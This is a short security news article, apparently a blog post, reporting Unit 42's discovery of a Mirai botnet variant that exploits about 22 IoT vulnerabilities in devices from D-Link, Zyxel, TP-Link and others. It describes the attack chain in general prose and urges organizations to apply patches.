top of page

Mirai Variant Exploits Multiple IoT Vulnerabilities in New Attack Wave

A new variant of the notorious Mirai botnet has emerged, targeting a range of IoT vulnerabilities in an ongoing campaign discovered since March 2023. Palo Alto's Unit 42 Networks researchers have identified threat actors exploiting these vulnerabilities to gain complete control over compromised devices, enabling them to launch additional attacks, including devastating DDoS attacks.


The recently spotted Mirai botnet variant has been observed in two separate campaigns, which began on March 14 and experienced spikes in activity during April and June. This variant specifically targets approximately 22 known security flaws in various connected products such as routers, DVRs, NVRs, WiFi communication dongles, thermal monitoring systems, access control systems, and solar power generation monitors. Among the affected products are those manufactured by industry leaders such as D-Link, Nagios, Arris, Zyxel, TP-Link, SolarView, Nortek, Tenda, and MediaTek.


The attack chain commences by exploiting one of these vulnerabilities, paving the way for the execution of a shell script from an external resource. This script downloads a botnet client tailored to the compromised device's architecture, including armv4l, arm5l, arm6l, arm7l, mips, mipsel, sh4, x86_64, i686, i586, arc, m68k, and sparc. After the bot client is executed, the shell script downloader erases any traces of the client's file infection to minimize the likelihood of detection.


The proliferation of Mirai-inspired botnets continues to be a pressing concern. Recently, the Shadowserver Foundation reported active exploitation of a command injection flaw in Zyxel gear by a botnet resembling Mirai. Additionally, a variant known as IZ1H9 has been implicated in large-scale network attacks targeting Linux-based servers and networking devices. In February, another Mirai variant, identified as V3G4, leveraged 13 distinct vulnerabilities across three separate campaigns to unleash massive DDoS attacks.


As the abuse of IoT devices remains a persistent threat, organizations must remain vigilant. With the increasing popularity of Mirai and its variants among threat actors, it is crucial for organizations to prioritize device security by promptly applying the latest security patches. By doing so, they can mitigate the risk of falling victim to these evolving botnet threats.

1 view0 comments

Recent Posts

See All

Comments


bottom of page